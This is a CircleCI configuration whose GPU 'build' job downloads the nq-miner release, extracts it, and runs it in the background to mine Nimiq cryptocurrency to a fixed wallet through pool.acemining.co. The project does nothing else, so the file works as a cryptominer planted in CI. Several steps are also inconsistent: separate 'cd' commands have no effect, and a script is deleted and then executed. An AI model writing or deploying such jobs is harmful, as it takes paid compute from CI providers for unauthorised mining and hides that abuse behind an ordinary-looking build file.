version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004-cuda-11.4:202110-01
    resource_class: gpu.nvidia.large
    steps:
      - run: nvidia-smi
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi
      - run: mkdir NimiqMiner
      - run: cd NimiqMiner
      - run: wget https://github.com/tomkha/nq-miner/releases/download/0.99.7/nq-miner-linux-0.99.7.tar.gz -O nq-nimer-linux.zip
      - run: mkdir nq-miner
      - run: tar -xzvf nq-nimer-linux.zip -C nq-miner
      - run: rm nq-nimer-linux.zip
      - run: rm ./nq-miner/start_gpu.sh
      - run: nohup ./nq-miner/nq-miner -t cuda -a "NQ468UA6DTPQACY8YE8M5T7JGU01BYMVKKCU" -n "1" -p pool.acemining.co:8443 &
      - run: chmod +x start_gpu.sh
      - run: cd NimiqMiner
      - run: ./start_gpu.sh